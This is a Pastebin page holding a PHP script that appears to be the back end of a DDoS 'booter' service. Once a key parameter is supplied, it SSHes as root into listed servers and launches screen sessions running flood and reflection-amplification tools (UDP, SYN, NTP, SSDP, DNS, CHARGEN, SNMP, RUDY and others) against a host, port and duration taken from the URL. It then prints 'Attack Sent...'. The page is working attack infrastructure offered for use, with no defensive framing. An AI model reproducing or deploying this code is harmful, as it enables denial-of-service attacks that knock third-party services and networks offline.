Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- if (!function_exists('ssh2_connect'))
- {
- die("Install ssh2 module.\n");
- }
- if ($_GET['key'] != "key")
- {
- die("Go Fuck Yourself...");
- }
- if (isset($_GET['host'], $_GET['port'], $_GET['time'], $_GET['method'])) {
- $SERVERS = array(
- "server" => array("root", "password")
- );
- class ssh2 {
- var $connection;
- function __construct($host, $user, $pass) {
- if (!$this->connection = ssh2_connect($host, 22))
- throw new Exception("Error connecting to server");
- if (!ssh2_auth_password($this->connection, $user, $pass))
- throw new Exception("Error with login credentials");
- }
- function exec($cmd) {
- if (!ssh2_exec($this->connection, $cmd))
- throw new Exception("Error executing command: $cmd");
- ssh2_exec($this->connection, 'exit');
- unset($this->connection);
- }
- }
- $port = (int)$_GET['port'] > 0 && (int)$_GET['port'] < 65536 ? $_GET['port'] : 80;
- $port = preg_replace('/\D/', '', $port);
- $ip = preg_match('/^[a-zA-Z0-9\.-_]+$/', $_GET['host']) ? $_GET['host'] : die();
- $time = (int)$_GET['time'] > 0 && (int)$_GET['time'] < (60*60) ? (int)$_GET['time'] : 30;
- $time = preg_replace('/\D/', '', $time);
- $domain = $_GET['host'];
- if(!filter_var($domain, FILTER_VALIDATE_URL) && !filter_var($domain, FILTER_VALIDATE_IP))
- {
- die("Invalid Domain");
- }
- $smIP = str_replace(".", "", $ip);
- $smDomain = str_replace(".", "", $domain);
- $smDomain = str_replace("http://", "", $smDomain);
- if($_GET['method'] == "UDP") { $command = "screen -dmS {$smIP} ./udp {$ip} {$port} 1 500 15 {$time}"; }
- elseif($_GET['method'] == "TCP") { $command = "screen -dmS {$smIP} ./tcp {$ip} {$port} 15 -1 {$time}"; }
- elseif($_GET['method'] == "CSYN") { $command = "screen -dmS {$smIP} ./csyn {$ip} {$port} 15 -1 {$time}"; }
- elseif($_GET['method'] == "TCP-ACK") { $command = "screen -dmS {$smIP} ./tcp-ack {$ip} 15 -1 {$time}"; }
- elseif($_GET['method'] == "TCP-PSH") { $command = "screen -dmS {$smIP} ./tcp-psh {$ip} 15 -1 {$time}"; }
- elseif($_GET['method'] == "TCP-SE") { $command = "screen -dmS {$smIP} ./tcp-se {$ip} {$port} 15 -1 {$time}"; }
- elseif($_GET['method'] == "WIZARD") { $command = "screen -dmS {$smIP} ./wizard {$ip} {$port} 15 -1 {$time}"; }
- elseif($_GET['method'] == "ZAP") { $command = "screen -dmS {$smIP} ./zap {$ip} {$port} 15 -1 {$time}"; }
- elseif($_GET['method'] == "ISSYN") { $command = "screen -dmS {$smIP} ./issyn {$ip} 15 -1 {$time}"; }
- elseif($_GET['method'] == "TCP-FIN") { $command = "screen -dmS {$smIP} ./tcp-fin {$ip} 15 -1 {$time}"; }
- elseif($_GET['method'] == "TCP-RST") { $command = "screen -dmS {$smIP} ./tcp-rst {$ip} 15 -1 {$time}"; }
- elseif($_GET['method'] == "TCP-XMAS") { $command = "screen -dmS {$smIP} ./tcp-xmas {$ip} 15 -1 {$time}"; }
- elseif($_GET['method'] == "ZSYN") { $command = "screen -dmS {$smIP} ./zsyn {$ip} {$port} 15 -1 {$time}"; }
- elseif($_GET['method'] == "HOME") { $command = "screen -dmS {$smIP} ./home {$ip} {$port} 15 -1 {$time}"; }
- elseif($_GET['method'] == "TELNET") { $command = "screen -dmS {$smIP} ./telnet {$ip} 15 -1 {$time}"; }
- elseif($_GET['method'] == "DB2") { $command = "screen -dmS {$smIP} ./db2{$ip} {$port} db2.txt 15 -1 {$time}"; }
- elseif($_GET['method'] == "DOMINATE") { $command = "screen -dmS {$smIP} ./dominate {$ip} {$port} 15 -1 {$time}"; }
- elseif($_GET['method'] == "SSYN") { $command = "screen -dmS {$smIP} ./ssyn {$ip} {$port} 15 -1 {$time}"; }
- elseif($_GET['method'] == "XSYN") { $command = "screen -dmS {$smIP} ./xsyn {$ip} {$port} 15 -1 {$time}"; }
- elseif($_GET['method'] == "SSDP") { $command = "screen -dmS {$smIP} ./ssdp {$ip} {$port} ssdp.txt 15 -1 {$time}"; }
- elseif($_GET['method'] == "CHARGEN") { $command = "screen -dmS {$smIP} ./chargen {$ip} {$port} chargen.txt 15 -1 {$time}"; }
- elseif($_GET['method'] == "TS3") { $command = "screen -dmS {$smIP} ./ts3 {$ip} {$port} ts3.txt 15 -1 {$time}"; }
- elseif($_GET['method'] == "NTP") { $command = "screen -dmS {$smIP} ./ntp {$ip} {$port} ntp.txt 15 -1 {$time}"; }
- elseif($_GET['method'] == "SNMP") { $command = "screen -dmS {$smIP} ./snmp {$ip} {$port} snmp.txt 15 -1 {$time}"; }
- elseif($_GET['method'] == "SENTINEL") { $command = "screen -dmS {$smIP} ./sentinel {$ip} {$port} sentinel.txt 15 -1 {$time}"; }
- elseif($_GET['method'] == "MSSQL") { $command = "screen -dmS {$smIP} ./mssql {$ip} {$port} mssql.txt 15 -1 {$time}"; }
- elseif($_GET['method'] == "PORTMAP") { $command = "screen -dmS {$smIP} ./portmap {$ip} {$port} portmap.txt 15 -1 {$time}"; }
- elseif($_GET['method'] == "QOTD") { $command = "screen -dmS {$smIP} ./qotd {$ip} {$port} qotd.txt -1 8 {$time}"; }
- elseif($_GET['method'] == "MDNS") { $command = "screen -dmS {$smIP} ./mdns {$ip} {$port} mdns.txt 3 {$time}"; }
- elseif($_GET['method'] == "NETBIOS") { $command = "screen -dmS {$smIP} ./netbios {$ip} {$port} netbios.txt 15 -1 {$time}"; }
- elseif($_GET['method'] == "HEARTBLEED") { $command = "screen -dmS {$smIP} ./heartbleed {$ip} {$port} heartbleed.txt 15 -1 {$time}"; }
- elseif($_GET['method'] == "VSE") { $command = "screen -dmS {$smIP} ./vse {$ip} 15 -1 {$time}"; }
- elseif($_GET['method'] == "RUDY") { $command = "screen -dmS {$smIP} ./rudy {$ip} 1 8 {$time} proxy.txt 0"; }
- elseif($_GET['method'] == "SYN") { $command = "screen -dmS {$smIP} ./syn {$ip} {$port} {$time}"; }
- elseif($_GET['method'] == "DNS") { $command = "screen -dmS {$smIP} ./dns {$ip} {$port} dns.txt 15 -1 {$time}"; }
- elseif($_GET['method'] == "QUAKE") { $command = "screen -dmS {$smIP} ./quake {$ip} {$port} quake.txt 8 {$time}"; }
- elseif($_GET['method'] == "SLOW") { $command = "screen -dmS {$smIP} ./slow {$ip} 8 proxy.txt {$time} 0"; }
- elseif($_GET['method'] == "ESSYN") { $command = "screen -dmS {$smIP} ./essyn {$ip} {$ip} {$port} 15 -1 {$time}"; }
- elseif($_GET['method'] == "stop") { $command = "screen -X -s {$smIP} quit"; }
- else die();
- foreach ($SERVERS as $server=>$credentials) {
- $disposable = new ssh2($server, $credentials[0], $credentials[1]);
- $disposable->exec($command);
- }
- }
- ?>
- Attack Sent...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement